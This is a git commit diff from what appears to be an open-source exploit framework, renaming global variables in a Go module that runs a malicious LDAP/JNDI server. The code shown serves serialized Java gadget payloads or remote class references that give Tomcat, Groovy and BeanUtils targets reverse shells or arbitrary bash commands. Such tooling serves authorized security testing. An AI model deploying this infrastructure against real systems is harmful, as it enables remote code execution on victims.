Merge pull request #460 from vulncheck-oss/ldapjndi

j-baines · web-flow · commit 2284d778074b · 2025-10-14T11:21:41.000-04:00
Export ldapjndi global variables
diff --git a/java/ldapjndi/ldapjndi.go b/java/ldapjndi/ldapjndi.go
@@ -41,13 +41,13 @@ const (
 )
 
 // a dirty way to pass the user's desired gadget to `handleBind`.
-var globalSerializedPayload string
+var GlobalSerializedPayload string
 
 // a dirty way to pass the user's desired name to `handleBind`.
-var globalName string
+var GlobalName string
 
 // if the class is loaded from a secondary http server, this will be set.
-var globalHTTPServer string
+var GlobalHTTPServer string
 
 // automatically accept.
 func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
@@ -59,29 +59,29 @@ func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
 // Accept the incoming request. Verify it is asking for the correct endpoint
 // and then send the user's requested gadget'.
 func handleSearch(writer ldap.ResponseWriter, msg *ldap.Message) {
-	if len(globalSerializedPayload) == 0 {
+	if len(GlobalSerializedPayload) == 0 {
 		output.PrintFrameworkError("A serialized payload was never configured!")
 	}
 
 	req := msg.GetSearchRequest()
 	dname := string(req.BaseObject())
 
-	if dname != globalName {
-		output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, globalName)
+	if dname != GlobalName {
+		output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, GlobalName)
 
 		return
 	}
 
 	// send search result
 	res := ldap.NewSearchResultEntry(dname)
-	if strings.HasPrefix(globalSerializedPayload, "\xca\xfe\xba\xbe") {
+	if strings.HasPrefix(GlobalSerializedPayload, "\xca\xfe\xba\xbe") {
 		res.AddAttribute("javaClassName", "foo")
-		res.AddAttribute("javaCodeBase", message.AttributeValue(globalHTTPServer))
+		res.AddAttribute("javaCodeBase", message.AttributeValue(GlobalHTTPServer))
 		res.AddAttribute("objectClass", "javaNamingReference")
-		res.AddAttribute("javaFactory", message.AttributeValue(globalName))
+		res.AddAttribute("javaFactory", message.AttributeValue(GlobalName))
 	} else {
 		res.AddAttribute("javaClassName", "java.lang.String")
-		res.AddAttribute("javaSerializedData", message.AttributeValue(globalSerializedPayload))
+		res.AddAttribute("javaSerializedData", message.AttributeValue(GlobalSerializedPayload))
 	}
 	writer.Write(res)
 
@@ -106,21 +106,21 @@ func CreateLDAPServer(name string) *ldap.Server {
 	server.Handle(routes)
 
 	// set a name so that we aren't tossing exploits at just anyone
-	globalName = name
+	GlobalName = name
 
 	return server
 }
 
 func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, command string) {
 	switch gadget {
 	case TomcatNashornReverseShell:
-		globalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
+		GlobalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
 	case TomcatGenericBash:
-		globalSerializedPayload = createTomcatGenericGadget(command)
+		GlobalSerializedPayload = createTomcatGenericGadget(command)
 	case GroovyGenericBash:
-		globalSerializedPayload = createGroovyGenericBash(command)
+		GlobalSerializedPayload = createGroovyGenericBash(command)
 	case BeanUtils194GenericBash:
-		globalSerializedPayload = createBeanUtils194GenericBash(command)
+		GlobalSerializedPayload = createBeanUtils194GenericBash(command)
 	case HTTPReverseShell:
 		fallthrough
 	default:
@@ -131,7 +131,7 @@ func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, co
 func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost string, httpPort int) {
 	switch gadget {
 	case HTTPReverseShell:
-		globalSerializedPayload = createHTTPReverseShell(lhost, lport, globalName)
+		GlobalSerializedPayload = createHTTPReverseShell(lhost, lport, GlobalName)
 	case TomcatNashornReverseShell:
 		fallthrough
 	case TomcatGenericBash:
@@ -146,9 +146,9 @@ func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost strin
 		return
 	}
 
-	globalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
-	http.HandleFunc("/"+globalName+".class", func(w http.ResponseWriter, _ *http.Request) {
-		fmt.Fprint(w, globalSerializedPayload)
+	GlobalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
+	http.HandleFunc("/"+GlobalName+".class", func(w http.ResponseWriter, _ *http.Request) {
+		fmt.Fprint(w, GlobalSerializedPayload)
 	})
 
 	output.PrintfFrameworkStatus("Starting HTTP Server on %s:%d", httpHost, httpPort)
